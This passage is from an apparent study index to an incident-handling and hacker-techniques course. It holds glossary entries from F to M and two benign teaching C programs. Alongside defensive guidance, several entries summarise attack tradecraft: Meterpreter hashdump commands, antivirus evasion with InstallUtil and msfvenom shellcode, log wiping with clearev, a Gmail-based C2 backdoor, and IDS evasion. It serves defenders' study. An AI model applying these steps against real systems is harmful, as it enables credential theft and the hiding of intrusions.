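 * (a user name, a file name) is worth logging as a format string attempt. */
int count_format_directives(const char *user_input)
{
    int count = 0;
    size_t i = 0;
    while (user_input[i]) {
        if (user_input[i] != '%') { i++; continue; }
        i++;                                   /* step past '%' */
        if (user_input[i] == '%') { i++; continue; }
        while (user_input[i] && strchr("-+ #0123456789.$hlLqjzt", user_input[i]))
            i++;                               /* flags, width, precision, length */
        if (user_input[i] && strchr("diouxXeEfFgGaAcspn", user_input[i])) {
            count++;
            i++;
        }
    }
    return count;
}

int main(void)
{
    const char *hostile = "%x %x %x";           /* constructed sample input */
    printf("safe copy kept \"%s\" literal: %s\n", hostile,
           safe_copy_is_literal(hostile) ? "yes" : "no");
    printf("%%n stored %d after \"Hello world!\"\n", percent_n_demo());
    printf("directives in \"%s\": %d\n", hostile, count_format_directives(hostile));
    return 0;
}
```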
Foundscan (Book 2, p. 116): Commercial vulnerability scanner (web-based scanning service)
Fragmentation - Reassembly Methods (Book 2, p. 119):
  Lowest Offset
  First Wins Tie
  Highest Offset
  Last Wins Tie
FragRoute (Book 2, p. 120):
  Customizable fragmentation crafter, useful for IDS evasion
  - Doesn't route; sits on the NIC to fragment packets from the attack app
  - Includes a language for defining specific twisted fragment attacks
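Added example (not from the course material or this cheat sheet): a C model of the four reassembly methods listed in the Fragmentation entry, run against two constructed pairs of overlapping fragments to show that each policy yields a different payload from the same fragments. That disagreement is what FragRoute-style overlap tricks exploit, and why an IDS has to reassemble the way the destination host does. The type and function names (Policy, Fragment, reassemble, reassemble_sample) are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not course code.  Models the four reassembly policies named
 * in the Fragmentation entry (first wins, last wins, lowest offset wins,
 * highest offset wins).  An IDS that reassembles with a policy other than the
 * destination host's inspects a different byte stream than the host receives. */

typedef enum {
    POLICY_FIRST,            /* first fragment to cover a byte keeps it */
    POLICY_LAST,             /* last fragment to arrive overwrites it */
    POLICY_LOWEST_OFFSET,    /* fragment with the lower offset wins */
    POLICY_HIGHEST_OFFSET    /* fragment with the higher offset wins */
} Policy;

typedef struct {
    size_t offset;           /* byte offset within the reassembled payload */
    const char *data;        /* fragment payload (constructed sample text) */
} Fragment;

#define MAX_PAYLOAD 64

/* Reassemble frags (listed in arrival order) into out, which must hold
 * MAX_PAYLOAD + 1 bytes.  Bytes no fragment covered are left as '.'.
 * Returns the payload length (highest covered byte + 1). */
size_t reassemble(const Fragment *frags, int n, Policy policy, char *out)
{
    int owner[MAX_PAYLOAD];          /* which fragment currently holds each byte */
    size_t total = 0;

    memset(out, '.', MAX_PAYLOAD);
    for (int b = 0; b < MAX_PAYLOAD; b++)
        owner[b] = -1;

    for (int i = 0; i < n; i++) {
        size_t len = strlen(frags[i].data);
        for (size_t k = 0; k < len && frags[i].offset + k < MAX_PAYLOAD; k++) {
            size_t b = frags[i].offset + k;
            int cur = owner[b];
            int take = 0;
            if (cur == -1)
                take = 1;                                   /* no overlap yet */
            else if (policy == POLICY_LAST)
                take = 1;
            else if (policy == POLICY_LOWEST_OFFSET)
                take = frags[i].offset < frags[cur].offset;
            else if (policy == POLICY_HIGHEST_OFFSET)
                take = frags[i].offset > frags[cur].offset;
            /* POLICY_FIRST: an already-covered byte is never replaced */
            if (take) {
                out[b] = frags[i].data[k];
                owner[b] = i;
            }
            if (b + 1 > total)
                total = b + 1;
        }
    }
    out[total] = '\0';
    return total;
}

/* Two constructed samples, each in arrival order.  Sample 0 delivers the
 * overlapping middle piece first; sample 1 delivers the full payload first. */
static const Fragment sample0[] = { { 2, "xyz" }, { 0, "ATTACK" } };
static const Fragment sample1[] = { { 0, "ATTACK" }, { 2, "xyz" } };

/* Reassembled payload of one sample under one policy (static buffer). */
const char *reassemble_sample(int sample, Policy policy)
{
    static char out[MAX_PAYLOAD + 1];
    reassemble(sample ? sample1 : sample0, 2, policy, out);
    return out;
}

int main(void)
{
    static const char *names[] = { "first", "last", "lowest offset", "highest offset" };
    for (int s = 0; s < 2; s++)
        for (int p = 0; p < 4; p++)
            printf("sample %d, %-14s wins: %s\n", s, names[p],
                   reassemble_sample(s, (Policy)p));
    return 0;
}
```

Sample 0 separates "first" from "lowest offset" and sample 1 separates "first" from "highest offset", so the two runs together tell all four policies apart.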

FragRouter (Book 3, p. 52): IP forwarding will likely decrement the TTL of the packet as it moves to the outside world. An attacker could use FragRouter configured not to fragment, with a simple change to the code commenting out the line that decrements the TTL
FTP Proxy "Bounce Attack" scans (Book 2, p. 94): Bounce an attack off a poorly configured FTP server
Gcat (Book 5, p. 128):
  Full C2 backdoor where all Command and Control traffic flows over Gmail
  - Command execution, screenshots, download and upload files, keylogging, execution of shellcode
  -Bypasses many DLP/IDS/IPS systems
GECOS (Book 4, p. 36): This is a free-form field that can hold other information about the user
Generic Route Encapsulation Redirector (GRE) (Book 4, p. 74): Some bots can start a GRE (Generic Route Encapsulation) Redirector, so an attacker can send IP packets across a GRE tunnel to an infected system
gets (Book 3, p. 99): Vulnerable to buffer overflow; doesn't bounds check
Ghostwriting (Book 3, p. 148):
  Process of modifying the assembly of an executable in order to bypass antivirus; this is done via insertion of junk code
  An attacker can simply:
  1.) Create an .exe
  2.) Convert it to an .asm file
  3.) Edit the .asm file
  4.) Convert it back to an .exe file
Google Cache (Book 2, p. 39):
  Search on "cache:www.google.com"
  Brings up the cached version of the page
Google Hacking Database (Book 2, p. 35): A hacking database with more than 1,000 different useful searches to locate many problems on target domains.
Google: Remove Data (Book 2, p. 44):
  Remove unwanted items from Google
  --Fill out request form
  --Make specific change to page
Grsecurity (Book 3, p. 126): Non-executable system stack, Linux, protects against buffer overflow
GRR Rapid Response - Preparation (Book 1, p. 39):
  Linux, OS X, and Windows clients
  - Remote memory analysis via Rekall
  Python-based agent
  Pulls in-depth forensic artifacts from multiple systems asynchronously
Hacker (Book 2, p. 5): A highly intelligent individual who wants to explore technology to learn.
Hacktivism (Book 2, p. 10): Launching computer attacks to make a political point. The most common form is web-site tampering.
Hash Dumping (Book 4, pp. 29 - 30):
  Can be obtained by:
  --Dump hashes from the Domain Controller (admin)
  --Use Cain, Abel, or pwdump tools
  --Fizzgig's fgdump, which shuts down AV tools
  --Use Metasploit Meterpreter's hashdump script to pull them from memory or the hashdump command to pull them from the registry
  *meterpreter> hashdump         <---- pulls from memory
  *meterpreter> run hashdump     <---- pulls from registry
  If not the admin:
  -Boot into another OS and copy the SAM
  -Obtain a copy from c:\windows\repair or a backup directory
  -Obtain a copy from a tape or emergency repair disk
  -Sniff passwords off the network using Cain's sniffers
  --useful for LANMAN Challenge/Response, NTLMv1, NTLMv3 or Kerberos pre-auth
Heartbleed (Book 3, p. 65): Allows an attacker to pull server keys from memory
Hiding Files (NTFS) (Book 5, p. 99): See Covering Tracks: Hiding Files (NTFS)
High Orbit Ion Cannon (Book 4, p. 162):
  Easier-to-use interface
  Multithreaded so that it can launch more HTTP requests more quickly at target machines.
  Support for a feature called boosters, which are simply customizable JavaScript-based scripts that cause HOIC to access multiple pages on a target web server.
Hijacking (Book 3, p. 70):
  Two attack vectors:
  --LLMNR, and Web Proxy Auto-Detect (WPAD)
Hijacking Attack: Defenses (Book 3, p. 75):
  Hijacking synthesizes sniffing plus spoofing, so the defenses for those attacks are combined for session hijacking.
  Hard-code ARP tables on sensitive LANs
  Activate port-level security on your switches
  --Lock down each physical port to allow only a single MAC address
  --Or lock down each physical port to allow only a specific MAC address
  Use Dynamic ARP Inspection with DHCP snooping
  Disable LLMNR and WPAD!!!
  For defense against network-based hijacking attacks, encrypt sessions and use strong authentication
  --Secure Shell (SSH v2) or VPN with encryption
  --Especially important for critical infrastructure components
  -- Don't telnet to your firewalls, routers, directory systems, or PKI machines
  If the originating host is compromised, strong authentication and encrypted paths do not help, because the session is stolen at the originating machine
Host Perimeter Detection (Example) (Book 1, p. 55): View Diagram
HTA Drive-By (Book 3, p. 53): MitMf attack that can insert malicious .hta files into the stream
Hybrid Attacks (Password Cracking) (Book 4, p. 13):
  Start with a dictionary
  Concatenate items (numbers, letters) to the dictionary words
  More advanced hybrid attacks:
  --Shave characters off the dictionary term
  --Make "leet" speak substitutions in dictionary terms
  Sometimes referred to as word mangling
  John the Ripper includes fantastic word-mangling rules for determining potential passwords
Hydan (Book 5, pp. 143, 145):
  Hydan hides data in executables written for i386
  -Supports BSD, Linux, and WinXP
  -Encrypts data with Blowfish, then embeds the data
  Result: one executable, same size
  **Uses polymorphic coding techniques to hide data w/o altering functionality
  -Hides 1 byte per 150 bytes of code; alters the statistical pattern of instructions
Hydan: Efficiency Rate and Detection (Book 5, p. 148):
  Can hide 1 byte of data in approx. 150 bytes of code
  Does alter the statistical pattern of instructions in a program
Hydan: How It Hides Info (Book 5, pp. 146, 147):
  It first encrypts the message using Blowfish
  Next, it uses polymorphic coding techniques to hide the data
  **Uses add or subtract functions
  It dynamically rebuilds the executable from the ground up, making substitutions of adds and subtracts to hide the necessary bits. The resulting executable's size is the same because ADD and SUB are the same size
Hydra (Book 4, p. 8):
  Guesses passwords
  Dictionary support
  Supports a variety of protocols
  RDP finally added
  --Runs on Linux and UNIX
iastor.sys (Book 5, p. 77): Driver modified by Alureon
ICMPCmd (Book 5, p. 128): Windows shell tool using ICMP
ICMPShell (Book 5, p. 128): Linux shell tool
Identification - Additional Assessment Questions (Book 1, p. 95): What level of skill and prerequisites are required by an attacker to exploit the vulnerability? Is a fix available? Do other factors exist that reduce or increase the vulnerability risk or potential impact?
Identification - Assessment (Book 1, p. 94):
  How widely deployed is the system?
  What is the value of the system/data?
  What is the potential impact?
  Can this be exploited remotely?
  Is there a public exploit?
  --verify via CVE, Bugtraq or ISC
  **Must carefully review all facts and provide an initial assessment
  --determine incident vs. event
Identification - Assigning Handlers (Book 1, p. 50):
  Assign a person to be the primary incident handler
  -Select a person to handle identification and assessment
  -Assign a specific set of events and systems to analyze
  **Very helpful to support sysadmins handling little problems and provide them a means to escalate as needed.
Identification - Control Information Flow (Book 1, p. 51):
  Enforce a "need to know" policy
  -you may be required to testify; maintain the integrity of the investigation by keeping it within official channels and limiting the potential witness pool
  **early disclosure may inform the culprit or embarrass the org.
Identification - Points to Keep in Mind (Book 1, p. 49):
  Be willing to alert early!
  Provide indications and warning
  Provide current "intelligence" (up-to-date information) to the incident handler
  Fuse or correlate information
Identification - Where Does Identification Occur? (Book 1, p. 53):
  Network perimeter
  Host perimeter
  System-level (host)
  Application-level
Identification Across All Levels (Book 1, p. 59): You want identification capabilities at all four levels: network perimeter, host perimeter, host level, and application level
Identification - Communications Channels (Book 1, p. 52):
  Rely on out-of-band communications
  -Use telephones and faxes
  --VoIP can be sniffed and played back using a variety of tools (Wireshark, Cain, VOMIT) if it is not encrypted
  Plan for encryption that might be needed (GnuPG, PGP, S/MIME)
  -Share keys in advance
  Possibly encrypted cloud storage, such as Tresorit or SecureSafe
Identification - Establish Chain of Custody (Book 1, p. 96):
  Maintain a provable chain of custody
  --Do NOT delete ANY files until the case is closed
  --Identify every piece of evidence in your notebook
  --Control access to evidence
  Each piece of evidence must be under the control of one identified person at all times
  -Include an access log; record who and when
  Record when you lock it up in storage
  **When turning over evidence to law enforcement, have them sign for it
  --only give LE copies unless absolutely required
Identification of Insider Activity (Insider Threat) (Book 1, p. 174):
  Gathering intelligence on system activity
  - What web sites and FTP sites are being visited?
  -Hacking tools, encryption tools, stego software, free web-based e-mail sites
  Monitor message boards for posted financial or merger information
  Gather intelligence on your employees' activities
  - targeting a particular employee requires written HR approval
Idle scans (Book 2, p. 94): This scan type can be used to divert attention, obscuring the attacker's location on the network
IDS/IPS Evasion - Blending In (Book 2, p. 112): The goal is to use a protocol which is normal, many times with a valid user ID and password for the target environment
IDS/IPS Evasion - Defense (Book 2, p. 113):
  Reassemble packet streams before making filtering or intrusion-detection decisions.
  -Try to mirror the OS as closely as possible.
  Keep your IDS and IPS up to date
  -ensure the IDS/IPS has adequate resources to maintain throughput
IE SSL Warning Message (Book 3, p. 62): See screenshots
ifconfig wlan0 hw ether [MACaddr] (Book 2, p. 72): Linux command used to change the MAC address
imageinfo (Book 5, p. 23): Shows the date and time the memory dump was captured
Improving Defenses (Eradication) (Book 1, p. 119):
  Implement appropriate protection techniques
  - Applying firewall and/or router filters
  - Moving the system to a new name/IP address
  - Null routing particular IP addresses
  - Changing DNS names
  - Applying patches and hardening the system
Inappropriate Web Access (Unauthorized Use) (Book 1, p. 168): Only investigate individual use if HR requests such action in writing
Inception (Book 3, p. 4): Unlocking a powered-on and locked computer via DMA over FireWire/Thunderbolt connections; great for gaining access to systems with hard drive encryption.
Incident (Book 1, p. 11):
  Refers to an adverse event in an information system and/or network
  **** Incident implies harm or the attempt to harm.
Incident Handling (Book 1, p. 10):
  An action plan for dealing with the misuse of computer systems and networks
  --Keep written procedures and policy in place
  --It also covers insider crime and intentional and unintentional events that cause loss of availability
Incident Handling for Intellectual Property Cases (Book 1, p. 181): Prep: Survey your Intellectual Property; ID: Look for leaks; Containment: Criminal or civil case; Lessons Learned: N/A
Incident Handling Phases (Book 1, p. 17): Preparation - Identification - Containment - Eradication - Recovery - Lessons Learned
inetd (Book 2, p. 105): *nix service initialization script
Ingress and Egress Data (Enterprise-wide IR) (Book 1, p. 132): Need to start somewhere. Connection data from the various points of presence is a good start: 1. Web Proxy, 2. DNS Cache, 3. Connection Logs
Initial Identification Assessment (Book 1, p. 93): Determine whether an event is actually an incident. Check for simple mistakes. Assess the evidence in detail. Maintain situational awareness, reporting to the chief.
Insider Threat (Book 1, p. 172):
  Simply stated, a threat from an entity with access to your data
  - An employee (including contract and temp employees)
  - A business partner (someone that has legitimate access, but is not an employee)
  - Such attackers usually have valid credentials and knowledge of the environment and its business practices
Insider Threat Checklist (Insider Threat) (Book 1, pp. 175 - 176):
  With written approval from HR, you can monitor an individual suspect's activity:
  -Identify equipment being used
  -Identify the operating system being used
  -Identify the suspect's IP address
  -Begin monitoring HTTP activity
  -Monitor the IP address using IDS tools
  -Monitor e-mail
  Monitor phone numbers called
  Confirm background check data
  Perform an after-hours visit
Insider Threat Checklist (3) (Book 1, p. 177):
  Review the data from the machine
  Summarize your findings
  - What does it all add up to?
  Interview the insider, if required
  -Very important: Make no promises
  -What is the suspect's version?
  -Why was it done?
  -How long has it been going on?
  -What is the damage?
inSSIDer (Book 2, p. 61): Noisy; sends out SSID-less probe requests and listens for probe responses, therefore cannot detect APs that don't respond to such requests
InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe (Book 3, p. 153): See screenshots
InstallUtil-ShellCode.cs (Book 3, p. 152):
  Pull down InstallUtil-ShellCode.cs and insert msfvenom output (-f csharp) into it
  Compile with the csc.exe tool
  --Effective because it does not need a full Visual Studio environment
  Walkthrough here
  We can compile these .exe files with the csc.exe utility, which is great for lightweight compilation on Windows systems
Intellectual Property (Book 1, p. 179):
  Intellectual Property is the primary distinction between two competitors
  - will come under continuous attack
  -patents, copyrights, trademarks, trade secrets
  Apply standard IH procedures, but tailor them to sensitive data
  -ID and prepare defense/reaction for this material
Interrogating Targets via SMB Sessions (SMB Enumeration) (Book 2, p. 136):
  enum -S [TargetIPaddr]   pulls a list of shares (IPC$, ADMIN$, and C$)
  enum -U                  pulls list of users
  enum -G                  pulls groups and membership
  enum -P                  pulls password policy information
  Enum uses a NULL SMB session
  Use -u [User Name] -p [Password] for an authenticated session in Enum
inurl:"ViewerFrame?Mode=" (Book 2, p. 42): Shows numerous Panasonic cameras around the world, some of which allow you to control zoom, tilt, and pan
Invalid TCP Checksum Bypass (Book 2, p. 111): Many IDS/IPS systems do not validate the TCP checksum. An attacker can insert a TCP Reset with an invalid checksum to clear the IDS/IPS buffer. Target systems drop any packet with an invalid TCP checksum
Invisible Secrets (Book 5, p. 143): Hides data in banner ads that appear on websites
IPv6 scanning (Book 2, p. 94): Iterates through a series of IPv6 addresses scanning for target systems and ports, invoked with the "-6" syntax. Today all Nmap scan types support a -6 option. In older versions of Nmap, IPv6 scans were limited to ping sweeps to identify host addresses in use, TCP connect scans, and version scans only
ISP Coordination (Containment) (Book 1, p. 108):
  For external attacks, coordinate closely with your Internet service provider
  - It may be able to assist you in identification, containment, and recovery
  *Especially for large packet floods, bot nets, worms and virulent spam
ISR-Evilgrade tool (Book 2, p. 12):
  --Listens for software to request an update
  --Sends a response with malware
  --Currently includes modules for Java browser plug-ins, WinZip, WinAmp, Mac OS X, OpenOffice, iTunes, LinkedIn toolbar, and more
  --More than 60 software packages in total whose Internet updates can be subverted this way
Jikto (Book 4, p. 112): Performs a Nikto scan of internal websites using XSS
Jikto (Book 2, p. 111): Performs a Nikto scan of internal websites using XSS functionality
John the Ripper (Book 4, p. 35): A very powerful and fast password cracking tool. Runs on UNIX, Linux, and Windows of all kinds
John the Ripper (Book 4, pp. 35 - 38):
  You must feed it an encrypted password file:
  -On UNIX you can feed it the passwd or shadow file
  -If you unshadow before running, John can compute initial guesses from the GECOS field, which speeds up cracking.
  -For Windows passwords, just give John the text-based output from pwdump3 or fgdump
  Single Crack Mode:
  -Uses variations of account name, GECOS, and more
  Wordlist Mode: Uses dictionary and hybrid
  Incremental Mode: Uses brute force guessing
  External Mode: Uses an external program to generate guesses
  -DES, eDES, MD5, Blowfish, LANMAN, NT, NTLMv1,
John the Ripper: Defenses (Preparation) (Book 4, p. 40):
  Guard the password file!
  --Carefully protect backups
  --Physically protect system build media
  Enforce strong passwords:
  --With (PAM) or a related tool
  Use shadow passwords
  Use crypto-based and token-based authentication
John's Cracking Modes (Book 4, p. 38):
  Single Crack Mode:
  --Uses variations of account name, GECOS, and more
  Wordlist Mode:
  --Uses dictionary and hybrid
  Incremental Mode:
  --Uses brute force guessing
  External Mode:
  --Uses an external program to generate guesses
John's Input and Output (Book 4, p. 39):
  John supports and autodetects the following formats: standard and double-length DES, BSDI's extended DES, FreeBSD's MD5, OpenBSD's Blowfish, and Windows LANMAN
  Cracked passwords are stored in the john.pot file; remove the file when finished with the password audit
Jskeylogger (Book 3, p. 54): MitMf has a module that allows us to grab keystrokes by injecting code into viewed webpages
Jsteg (Book 5, p. 143): Hides in JPEG images using the DCT coefficients
Jump Bag - Additional Helpful Items (Book 1, p. 46): Call list and phone book; cell phone w/ extra batteries; anti-static plastic baggies w/ ties for storing evidence. Baggies w/ white embossed squares let you write content notes on the bag. Desiccants for handling moisture in bags. Extra notebooks, additional copies of all incident forms. Change of clothes, deodorant, aspirin, antacid.
Jump Bag - Additional Software (Book 1, p. 42): Diagnosis software you can trust. Statically linked binary executables from write-once media (CD or USB). It is not advised to use bootable Windows PE environments. Instead, use a good bootable Linux environment, such as SIFT.
Jump Bag - Final Items (Book 1, p. 47): Small jumpers (to alter a hard drive from master to slave), flashlight, screwdrivers, female-to-female RJ-45 connector, extra pens, tweezers, mechanics' mirrors for looking around corners, telescoping "hands" for grabbing small items, business cards.
Jump Bag - Hardware (Book 1, p. 44): USB token (at least 8GB), external hard drives with USB 2 and USB 3 interfaces and possibly FireWire and/or Thunderbolt (2TB). Ethernet TAP (4 to 8 ports preferable), patch cables (at least 2 straight-through and 1 crossover), USB cables and serial cables.
Jump Bag - Investigative Tools (SIFT) (Book 1, p. 43): One of the best freely available Linux environments for investigations, incident handling, and digital forensics. This VMware appliance includes hundreds of tools to examine data. Includes the Sleuth Kit, PTK, Autopsy GUI, Wireshark, md5deep, and the Volatility suite.
Jump Bag - More Hardware (Book 1, p. 45): Laptop w/ multiple operating systems. Use the operating system you have the most experience in. VMs (VMware, VirtualBox, or Virtual PC). Large hard drive (at least 1.5TB, but more if you can afford it), lots of RAM (at least 32GB), solid state drives.
Jump Bag - Software Preparation (Book 1, p. 41):
  Binary image-creation software: dd, Netcat, and ncat, SafeBack, etc.
  Forensic software: Sleuth Kit, Autopsy, EnCase, Forensic Toolkit, X-Ways Forensics, SIFT
  Hardware: laptop, tap, hub, cabling, write-blocker
  **bring your own trusted libraries; rootkits can trick your tools!!
Kansa in Action (Enterprise-Wide IR) (Book 1, pp. 141-143): Kansa Running and Kansa Things to Look For
Kansa Setup (Enterprise-wide IR) (Book 1, p. 140):
  Kansa requires PowerShell 3.0
  --install Handle.exe / autorunsc.exe from Sysinternals
  --on the machine launching the scripts, install Logparser and enable Remote Management: C:\>winrm quickconfig
  -Add all hosts you want checked into a text file and load it in the Kansa-Master directory
Karmetasploit (Book 2, pp. 69, 70, 71):
  Listens on a wireless interface for probe requests
  --pretends to be the sought-after wireless access point
  Serves up exploits for vulnerable clients when they try to connect
  --offers various services: DHCP, DNS, POP3, HTTP, Samba
Kernel (Book 5, p. 57):
  The kernel controls interactions between user programs and hardware
  User mode and kernel mode setting in hardware (Ring 3 and Ring 0 on x86)
  User programs make calls into the system call table
  -points to kernel code for implementing the system call
Kernel-Mode Rootkit Technique: Types (Book 5, p. 60):
  In general, there are (currently) four different methods for manipulating the kernel being publicly discussed
  1) Loadable kernel modules (UNIX) and device drivers (Windows)
  2) Altering the kernel in memory
  3) Changing the kernel file on the hard drive
  4) Virtualizing the system
  Each available on Linux and Windows (he said 5 methods)
kill / killall (Book 2, p. 105):
  Kill running processes on *nix systems
  kill [pid]
  killall [process_name]
Kismet (Book 2, p. 63): Passive WAP discovery; can also detect Zigbee w/ the right hardware
Kiwi's syslog (Book 5, p. 121): Third-party syslog tool for Windows
koders.com (Book 3, p. 107): code search engine
Kon-boot (Book 3, p. 4): USB boot attack where any password is accepted as a correct password.

LANMAN - Disabling Authentication*** (Book 4, p. 32):
  Stop storing LANMAN hashes in reg key:
  - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
  - On the Edit menu, click Add Key, type NoLMHash, and click OK
  Stop sending LANMAN Challenge/Response across the network:
  - LMCompatibilityLevel registry parameter
  - Level 3: send NTLMv2 authentication only (good for clients)
  - Level 5: Domain Controllers accept only NTLMv2

LANMAN Hashes (Book 4, pp. 16, 17, 18):
  By default, both LANMAN and NT hashes are stored on Windows NT/2000/XP/2003
  - On Windows 2000/XP/2003, passwords of 14 characters or less are hashed
  - Pad to exactly 14 characters
  - Convert to all uppercase characters
  - Split the 14 characters into two 7-character strings
  - Use each 7-byte string as a DES key
  ** No salt, very weak

LANMAN Hashes - Cracking (Book 4, pp. 16-18):
  Brute force attack on LANMAN hashes using a single top-of-the-line PC with quad processors (approximate times):
  - Alphanumeric characters: < 2 hours
  - Alphanumeric + some symbols: < 10 hours
  - Alphanumeric + all symbols: < 120 hours
  So no matter what the password is (as long as it doesn't have [alt] characters), the LANMAN hash can be cracked within 5 days

LANMAN Hashes - Cracking (Cain) (Book 4, pp. 16-18):
  Brute force attack on LANMAN hashes using a single top-of-the-line PC with quad processors (approximate times):
  - Alphanumeric characters: < 2 hours
  - Alphanumeric + some symbols: < 10 hours
  - Alphanumeric + all symbols: < 120 hours
  So no matter what the password is (as long as it doesn't have [alt] characters), the LANMAN hash can be cracked within 5 days

Lanturtle + Responder (Book 3, p. 4): USB attack where a malicious USB Ethernet adapter causes a system to generate DNS requests, and Responder can capture hashes

lastlog - Accounting Entries in UNIX (Book 5, p. 84):
  - lastlog: file shows login name, port, and last login time for each user
  - Default location on Linux: /var/log/lastlog

Least Significant Bit (Book 5, p. 149): reference

Lessons Learned - Meeting (Book 1, p. 128):
  Within two weeks of resuming production
  - Review the report
  - Finalize the Executive Summary
  - Keep it short and professional (maximum length = half day); don't start blaming

Linux Building Tools (Book 1, pp. 239-242): building tools to use (i.e. tar, configure, make)
Linux Cheat Sheet (Book 1, pp. 251-261): Linux cheat sheet to assist with unusual processes, services, files, network usage, scheduled tasks, log entries, accounts, etc.
Linux Cheat Sheet (Additional Supporting Tools) (Book 1, p. 262): Chkrootkit, Tripwire, AIDE, CIS Hardening Guidelines
Linux CMD's (whoami, id, sudo su -) (Book 1, p. 215): get more detailed information about your current user id and privileges
Linux File System navigation (Book 1, pp. 218-225): detailed description of navigating the file system (i.e. cd, ls, pwd, mkdir, locate, find, cat, head, tail, tar)
Linux File System Structure (Book 1, p. 217): detailed description of what is contained in each Linux file system directory (i.e., /root, /dev, /etc, /lib, /tmp, /var)
Linux for Hacker's Workshop (Book 1, pp. 210-215): basic Linux commands to assist you with your Hacker's toolkit
Linux Network Set-up (Book 1, pp. 233-238): basic network commands in Linux (i.e., service networking restart, ifconfig, ping, netstat)
Linux other odds-and-ends commands (Book 1, pp. 246-249): other useful commands to know in Linux (i.e. grep, man, info, shutdown)
Linux Running Programs (Book 1, pp. 226-232): description of running programs (i.e. $PATH, which ls, ps aux, bg, top, jobs)

Log Editing: Meterpreter Log File Alterations (Book 5, p. 111):
  The Metasploit Meterpreter also includes a log wiping utility
  - clearev command
  -- Clears all events from the Application, System, and Security logs
  -- No option to specify a particular type of log or event to wipe
  Currently it clears the event logs completely, but could be expanded in the future to line-by-line event log editing

Log Editing: Defenses from Covering Tracks on Systems (Book 5, pp. 112, 113):
  Preparation:
  - Use a separate server for logging
  -- In UNIX, syslog to a separate server
  -- Windows also supports syslog, through the use of third-party tools
  - Use behavioral analytics: Microsoft Advanced Threat Analytics, Rapid7 User Behavioral Analytics, Exabeam
  - Cryptographic integrity checks of log files
  Identification:
  - Look for gaps in logs
  - Look for corrupt logs
  - Look for odd user behavior
  Cont, Erad, Recov: N/A

Log Editing: Editing Logs w/Physical Access (Book 5, p. 110):
  With physical access, an attacker could boot to Linux and edit the Windows logs directly with a specialized tool
  A Linux boot disk for editing the Windows password database (SAM) can be found at http://pogostick.net/~pnh/ntpasswd
  - Be careful when using this on a machine with EFS on Windows XP and 2003
  - You will likely lose the EFS keys if you change the password on them
  This program cannot be used to edit logs

Loki (Book 5, p. 128): reference
Long Tail Analysis (Kansa) (Book 1, p. 139): Enterprise Wide IR PowerShell
Looking for Artifacts (Recovery) (Book 1, p. 125):
  Long-term recovery involves continuous monitoring for re-infection or artifacts; scripting this process is possible
  - Look for unusual processes: Windows reg, wmic or tasklist commands, or Linux ps command
  - Look for accounts used by the attacker: Windows wmic useraccount or net user commands, or Linux cat /etc/passwd
  - Look for simultaneous logins, or new accounts popping up

Low Orbit Ion Cannon (Book 4, p. 161):
  TCP connection floods, UDP floods, or HTTP floods (most common)
  - Allows attackers/volunteers to coordinate floods via IRC

Macof (Book 3, p. 48):
  Manipulates MAC to physical plug mapping
  - Floods the switch with traffic from lots of bogus MAC addresses, filling up the MAC table
  On some switches, when you fill up the MAC table the switch begins to act like a hub because it cannot remember new MACs

Macro_safe.py (Book 3, p. 147):
  Converts the .bin file created by Veil into a macro that can be imported into a spreadsheet.
  Breaks long lines into smaller lines (str = str + "STUF"); less likely to generate errors
  Get it here: https://github.com/khrox4osh/macro_safe.py

mailsnarf (Book 3, p. 51): save e-mail captured from SMTP and POP to the local host

Maltego (Book 2, p. 46):
  Gathers open-source intel on a target
  - Can be used to find information about a phone #, IP addr, etc.
  Defense: do a self-recon and correct inaccurate info.

Maltego Transforms (Book 2, p. 47):
  Starting points to find data on a target. Examples:
  - DomainToPhone_Whois
  - DomainToMXrecord_DNS
  - DomainToPerson_PGP
  - IPAddrToPhone_Whois
  - PersonToPerson_PGP
  - EmailAddressToEmailAddr

Maltego: Defense (Book 2, p. 48):
  Preparation:
  - Ensure that publicly available information about your organization is accurate
  -- Keep records up to date
  - Conduct your own recon
  Ident, Cont, Erad, Recov: N/A

Malware Layers (Book 5, p. 7):
  Application-Level
  User-mode Rootkit
  Kernel-Mode Rootkit
Malware: Application-Level Trojan: Backdoor Suites (Book 5, p. 9):
  Allow for complete control of a victim system remotely across the network
  Client-server architecture
  Very popular and many examples:
  - Poison Ivy, VNC, Dameware (commercial), Sub7, BlackShades, GhostRAT
  - Many common backdoors can self-install upon system exploit
  - Payload option in Metasploit
  Attackers can trick the victim into running the tool
  Most of these tools can be discovered with an antivirus tool.

Mandiant Redline (Labs) (Book 1, pp. 147-156): Mandiant Redline is an outstanding tool for memory analysis
Man-in-the-Middle Framework (MitMf) (Book 3, p. 51): supports ARP cache poisoning and multiple other injection/TCP stream modification attacks. Has the ability to manipulate TCP data on the fly
Masscan (Book 2, p. 98): separates out the SYNs and the SYN/ACKs, makes the scan faster
MD5 Crack Project (Book 4, p. 22): looks up words based on unsalted MD5 hashes and stores them in memory. Another similar project focuses on creating MD5 hashes and loading them into memory
md5sum (Book 2, p. 13): built-in Linux integrity tool
md5summer (Book 2, p. 13): file integrity checker, Windows

Memory Analysis (Book 5, p. 22):
  Used by investigators to analyze memory dumps from Windows machines to determine the attacker's actions, such as executing malicious application-level Trojan horse backdoors.
  A memory dump:
  - Can be generated using a variety of utilities, including Mandiant's Memoryze MemoryDD.bat, HBGary's fastdump, Matthieu Suiche's win32dd, winpmem, and ManTech's mdd
  Volatile Systems Volatility Framework
  - Free, open source, very feature rich and useful
  - A modular tool written in Python
  Google's Rekall
  - Free
  Create a memory dump with:
  - Memoryze MemoryDD.bat, fastdump, win32dd, winpmem, mdd
  Analyze it with: Volatility Framework, Google's Rekall

Messing w/TCP Layer (Book 3, p. 53):
  MitMf can insert malicious .hta files into the stream
  - This will be done with a fake update notification, prompting the user to run the .hta application
  - This module is called HTA Drive-By
  MitMf can also backdoor executable files it sees in transit
  - This is called FilePwn
  Bettercap also has plugins for arbitrary TCP modification
  - Simple plugin architecture and a full TCP proxy

Metamorphic Worms (Book 4, p. 66):
  Beyond changing their appearance, these worms will change their entire functionality
  Will contain encrypted/obfuscated payloads
  After an event occurs (time duration, infection rate, or other trigger), the worm morphs by decoding the hidden functionality

Metasploit Framework: Packaging Exploits (Book 3, p. 116):
  Runs on Windows, Linux, BSD and Mac OS X
  A modular tool tying together:
  - Exploit, payload and targeting (dest IP addr, port, options)
  - Exploit and payload development packages
  - Other computer attacks, including scanning and evasion tactics
Metasploit: Additional Features (Book 3, p. 123):
  - Multisession support for multiple targets
  - In-memory process migration
